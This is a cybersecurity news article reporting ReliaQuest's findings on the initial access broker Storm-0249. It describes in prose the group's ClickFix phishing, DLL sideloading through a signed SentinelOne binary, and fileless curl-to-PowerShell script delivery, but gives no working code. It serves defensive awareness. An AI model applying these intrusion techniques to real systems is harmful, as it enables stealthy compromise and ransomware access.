Red Hot Cyber
Cybersecurity is about sharing. Recognize the risk, combat it, share your experiences, and encourage others to do better than you.
Redazione RHC : 15 December 2025 07:28
A well-known initial access broker (IAB) called ” Storm-0249 ” has changed its operational strategies, using phishing campaigns as well as highly targeted attacks, which exploit the very security tools designed to protect networks as a means to achieve their goals.
The group uses an alarming new technique that includes a method called DLL sideloading . Malicious MSI packages are spread by Storm-0249 via phishing campaigns, often using social engineering tactics called “ClickFix,” which trick users into executing commands to fix supposedly bogus technical issues.
The ReliaQuest Threat Research Team (after the analysis was partly developed by TrendMicro specialists) has published an updated report, which highlights that the threat group is also misusing legitimate endpoint detection and response (EDR) processes, especially SentinelOne components, in order to cover its tracks and facilitate the launch of ransomware-type attacks.
Once executed with SYSTEM privileges, the installer drops a legitimate, digitally signed version of SentinelAgentWorker.exe, a core component of the SentinelOne security agent, into the user’s AppData folder. Along with it, it injects a malicious file named SentinelAgentCore.dll.
“When the attacker-carried SentinelOne binary is launched, it loads the malicious DLL instead of the legitimate one located alongside it,” the report explains .
This effectively turns the security tool into a Trojan horse. To network defense professionals, the activity appears as a standard EDR operation, allowing attackers to bypass signature-based detection and establish encrypted command-and-control (C2) channels disguised as legitimate telemetry.
Defenders should monitor:
In addition to sideloading , Storm-0249 also abuses built-in Windows utilities to evade detection. The group creates fake domains that mimic Microsoft URLs (for example, /us.microsoft.com/) to trick users and security filters.
ReliaQuest emphasizes that this does not indicate a vulnerability in SentinelOne itself. “Legitimate processes within common EDR tools, including SentinelOne, are not exploited, bypassed, evaded, or compromised with the techniques described in this document.” Instead, attackers are abusing the trust placed in signed binaries.
They then use curl.exe, a standard data transfer tool, to retrieve malicious scripts and send them directly to PowerShell memory. “Rather than saving the script to disk, where antivirus software could intercept it, the command sends the contents directly to PowerShell memory for immediate execution,” creating a “fileless” attack chain that leaves minimal forensic evidence.
The ultimate goal of these intrusions is to sell access to ransomware groups like LockBit and ALPHV. The report emphasizes that Storm-0249 conducts specific reconnaissance to extract the MachineGuid, a unique system identifier.
Follow us on Google News to receive daily updates on cybersecurity. Contact us if you would like to report news, insights or content for publication.
Redazione